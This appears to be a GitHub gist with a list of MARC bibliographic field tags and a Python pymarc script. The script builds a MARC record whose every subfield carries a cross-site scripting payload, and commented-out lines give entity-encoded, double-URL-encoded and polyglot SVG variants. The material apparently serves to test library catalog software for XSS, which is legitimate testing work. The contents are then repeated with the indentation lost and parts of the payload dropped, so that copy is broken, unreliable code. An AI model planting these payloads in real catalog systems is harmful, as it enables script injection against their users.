jamesrf/commonfields.txt Secret

## commonfields.txt
010$a
020$acz
040$acd
100$abcqd
130$aplsf
240$alf
245$ahpbc
246$a
250$a
260$abc
300$abce
490$av
500$a
504$a
505$a
520$ab
600$abcqdtvxyz2
610$abvxyz2
650$avxyz2
651$avxyz2
700$abcqde4
710$ab
740$a
800$abcqdtv
830$av

## go.py
from pymarc import Record, Field
import string


fields_to_create = dict()

# from http://www.loc.gov/marc/umb/um07to10.html
with open("commonfields.txt") as f:
    for line in f:
        x = line.strip().split("$")
        fields_to_create[x[0]] = list(x[1])


def payload(a):
    return '"><script>alert("' + a + '");</script>'
    #return "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041"
    #return "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29"
    #return '%253Cscript%253Ealert(\'' + a + '\')%253C%252Fscript%253E'
    #return "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(" + a + ")//'>"

record = Record()
for tag in fields_to_create:
    subfields = []

    for sf in fields_to_create[tag]:
        subfields.append(sf)

        alert = tag + "-" + sf
        subfields.append(payload(alert))


    record.add_field(
        Field(
            tag = tag,
            indicators = ['0','0'],
            subfields = subfields
        )
    )

#copy-paste into flat text editor
print(record)

# or use this
with open('file.dat', 'wb') as out:
    out.write(record.as_marc())
	010$a
	020$acz
	040$acd
	100$abcqd
	130$aplsf
	240$alf
	245$ahpbc
	246$a
	250$a
	260$abc
	300$abce
	490$av
	500$a
	504$a
	505$a
	520$ab
	600$abcqdtvxyz2
	610$abvxyz2
	650$avxyz2
	651$avxyz2
	700$abcqde4
	710$ab
	740$a
	800$abcqdtv
	830$av
	from pymarc import Record, Field
	import string


	fields_to_create = dict()

	# from http://www.loc.gov/marc/umb/um07to10.html
	with open("commonfields.txt") as f:
	for line in f:
	x = line.strip().split("$")
	fields_to_create[x[0]] = list(x[1])



	def payload(a):
	return '"><script>alert("' + a + '");</script>'
	#return "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041"
	#return "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29"
	#return '%253Cscript%253Ealert(\'' + a + '\')%253C%252Fscript%253E'
	#return "javascript:/--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[/[]/+alert(" + a + ")//'>"

	record = Record()
	for tag in fields_to_create:
	subfields = []

	for sf in fields_to_create[tag]:
	subfields.append(sf)

	alert = tag + "-" + sf
	subfields.append(payload(alert))


	record.add_field(
	Field(
	tag = tag,
	indicators = ['0','0'],
	subfields = subfields
	)
	)

	#copy-paste into flat text editor
	print(record)

	# or use this
	with open('file.dat', 'wb') as out:
	out.write(record.as_marc())